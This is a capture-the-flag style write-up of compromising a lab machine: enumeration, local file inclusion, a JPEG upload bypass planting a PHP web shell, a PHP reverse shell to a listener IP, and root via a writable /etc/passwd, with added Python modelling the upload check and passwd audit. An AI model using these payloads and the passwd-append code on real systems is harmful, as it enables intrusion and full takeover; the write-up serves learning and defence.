SunsetTwilight

Target IP: 192.168.186.91


Scanning

efa4a288db11d56dfc71e57f8ee12646.png
Port 25: SMTP
a531246969705c8b25c8f4ffdf120521.png
Port 80: HTTP
f92893bb784e8ee6254c3ee9b3038ecd.png
Ports 139 and 445: SMB
367425964f8096b2c36172799ab07c76.png
Port 2121: FTP
7f1504e7c187d5cb3fe5a4fe2cb8c8be.png
Port 3306: MySQL
29336d6234aadf7f9ff4759eb46dfc2d.png
Ports 8080 and 63525: HTTP
6108b62ba75cb00b8caed980c4d1ced0.png

There are many ports open on the target machine. I will start enumeration with SMB, since it allows guest access; FTP also allows anonymous login.


Enumeration

Ports 139 and 445: SMB
7c0d6638d83c969617fe79a055e53a74.png
There is a share called WRKSHARE, to which I only have read access. Browsing it, I found a user called miguel, and I also obtained the local.txt flag file through this access.

Port 2121: FTP
da2034a3333520a7e108c500148d0a8a.png
9618f121a817b64dbbf95e83a528e1ab.png
Logging in to FTP anonymously reveals an interesting file called 22253251-65325.twilight, which contains the message shown above.

Port 80: HTTP
/Gallery
6d9afe3edd7ca0a1c21d6c4c31152b11.png
Performing a directory search with the command gobuster dir -u http://192.168.186.91 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt produced the result above.

9627c10f7b5d77a6633def3071432e1c.png
ec3706abfd001d8030f41af09929a75b.png
There is an interesting directory called /gallery/. It looks like only JPEG files can be uploaded. After uploading a test JPEG file, I wanted to find out where the uploaded images are stored on the target machine.

f8a2baa1997217a4118ec0ab89f35d04.png
Using the WRKSHARE SMB share, I located where the images are stored on the server. When an image is uploaded, it is saved to three directories: original, thumbnail, and normal. So an uploaded image can be accessed at http://192.168.186.91/gallery/<directory_name>/<image_name>; for example, I accessed my test image by browsing to http://192.168.186.91/gallery/original/image.jpeg.

/lang.php
7dca4f7390d7acdc6a8a21ccb00c7b1c.png
The page above is displayed for this HTTP application. It looks like I can change the language of the page by pressing the button.
fa912b31e98ba15c4cc024b53b5ab989.png
An interesting parameter called lang gets appended to the end of the URL. Since the page appears to include a file named by this parameter, could this host be vulnerable to LFI?

2fd86dce6975241afda45730690fa2b7.png
And bingo: the target host is vulnerable to LFI, as I was able to read the /etc/passwd file. Trying to read miguel's SSH key did not work.

80c58373ad0288777f6fc24865755150.png
It is also possible to include the images from the different directories under the /gallery/ application; for example, by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/image.jpeg. Because an included file is executed as PHP regardless of its name, I should be able to place a simple web shell inside an uploaded "image" using this technique, and escalate it to a reverse shell connection.


Exploitation

e8f326033e2b83343c01b0e39689acc0.png
I created a copy of the same test image. I intercepted the file-upload POST request with Burp Suite and changed the highlighted items above. The server only seems to check whether the filename contains .jpeg, so this can be bypassed by appending .php to the name, giving evil.jpeg.php. I removed the image content and replaced it with a simple PHP one-liner web shell.

2270016a7fa9a1d17845474906034c13.png
And this uploaded successfully.
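The upload check the page infers ("does the filename contain .jpeg?") beside a hardened version, as an added Python model. This is my code, not the target's PHP upload handler (which the page does not show); the function names, the allowlist and the JPEG magic-byte check are my additions. The hardened check rejects both the double extension and a PHP body uploaded under a .jpeg name.

```python
import os
import re

# A real JPEG starts with the SOI marker FF D8 followed by a segment marker FF xx.
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_EXT = {".jpg", ".jpeg"}


def allowed_vulnerable(filename: str) -> bool:
    """Model of the check the writeup describes: accept if '.jpeg' appears anywhere.
    'evil.jpeg.php' passes because the substring match ignores the final extension,
    which is the one the web server uses to pick a handler."""
    return ".jpeg" in filename.lower()


def allowed_hardened(filename: str, content: bytes) -> bool:
    """Hardened check: no path components, exactly one extension from an allowlist,
    a conservative basename, and content that actually looks like a JPEG."""
    base = os.path.basename(filename)
    if base != filename or ".." in base:        # reject traversal / directory parts
        return False
    root, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_EXT:
        return False
    if "." in root:                             # reject a.jpeg.php, a.php.jpeg, ...
        return False
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", root):
        return False
    return content.startswith(JPEG_MAGIC)       # a PHP one-liner fails here


def stored_name() -> str:
    """Store under a server-chosen name so the uploader never controls the extension."""
    return f"{os.urandom(8).hex()}.jpg"


if __name__ == "__main__":
    webshell = b"<?php system($_GET['cmd']); ?>"   # constructed sample, assumed shell body
    print("vulnerable accepts evil.jpeg.php:", allowed_vulnerable("evil.jpeg.php"))
    print("hardened accepts evil.jpeg.php:", allowed_hardened("evil.jpeg.php", webshell))
```

Even with this check, the real fix for the chain in this writeup is on the include side: lang.php must map the lang parameter to a fixed set of files rather than including a user-supplied path, and the upload directory should have PHP execution disabled.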

48e1c04155fd087bc28bc99624858c64.png
I can now reach my web shell by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php. In the image above, I sent the command whoami;ls and got the results back. Time to upgrade this simple shell to a reverse shell connection. Since the host is running PHP, I will use a PHP payload.

c20405156b11c9df66cb9ec806d4d875.png
Now I have a foothold on the machine via the file upload and LFI vulnerabilities. The payload below connects back to my listener on 192.168.45.195:8443; it is shown URL-decoded first, then exactly as sent.
Decoded payload: php -r '$sock=fsockopen("192.168.45.195",8443);shell_exec("/bin/bash <&3 >&3 2>&3");'
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
URL with payload: 192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

3e4711e836599a6d30c634c5fb556fc1.png
The /etc/passwd file is writable by my current user, so I can add a new user with root privileges (UID 0).

b6d5be0e2ade35a7a27948c7ad027a30.png
I added a new user called super with the password rooted and UID 0. Switching to this user gives me root access.
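The passwd(5) entry that the privilege escalation relies on, together with the check a defender would run to catch it, as an added Python example. This is my code, not the author's; the sample passwd content is constructed, the user miguel and www-data are only assumed to exist from the LFI output, and the password hash is passed in rather than computed here (generate it on the attack box with, for example, openssl passwd -6 rooted).

```python
import os
import stat

# Constructed sample of the state before the attack (not the target's real file).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "miguel:x:1000:1000:miguel:/home/miguel:/bin/bash\n"
)


def root_passwd_entry(user: str, password_hash: str, shell: str = "/bin/bash") -> str:
    """Line for a second UID-0 account. Putting the crypt hash in field 2 instead of 'x'
    makes the system ignore /etc/shadow for this user, so a writable /etc/passwd alone
    is enough; su <user> then asks for the password the hash was made from."""
    for field in (user, password_hash, shell):
        if ":" in field or "\n" in field:
            raise ValueError("passwd fields may not contain ':' or newlines")
    return f"{user}:{password_hash}:0:0:root:/root:{shell}"


def append_entry(path: str, entry: str) -> None:
    """Append the entry; this is the whole exploit when the file is writable."""
    with open(path, "a") as fh:
        fh.write(entry + "\n")


def audit_passwd(text: str) -> dict:
    """Defender-side check over passwd content: extra UID-0 accounts, accounts carrying a
    hash inline instead of 'x' (shadow bypass), and accounts with an empty password."""
    extra_uid0, inline_hash, empty_pw = [], [], []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            extra_uid0.append(name)
        if pw == "":
            empty_pw.append(name)
        elif pw not in ("x", "*") and not pw.startswith("!"):
            inline_hash.append(name)
    return {"extra_uid0": extra_uid0, "inline_hash": inline_hash, "empty_password": empty_pw}


def is_world_writable(path: str) -> bool:
    """The misconfiguration that made this box exploitable: mode has the o+w bit."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


if __name__ == "__main__":
    print("before:", audit_passwd(SAMPLE_PASSWD))
    after = SAMPLE_PASSWD + root_passwd_entry("super", "$6$example$hashgoeshere") + "\n"
    print("after: ", audit_passwd(after))
    print("/etc/passwd world-writable:", is_world_writable("/etc/passwd"))
```

On a correctly configured host /etc/passwd is mode 0644 and every password field is x, so both findings lists come back empty; either of them being non-empty on a live system is worth an incident.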


Flags

5c01f32581f46e6b4aff6e06fdc34587.png
The proof.txt and local.txt flags. The local.txt flag can be obtained from the SMB WRKSHARE without exploiting the machine; I obtained the proof.txt flag thanks to the weak file permissions set on /etc/passwd.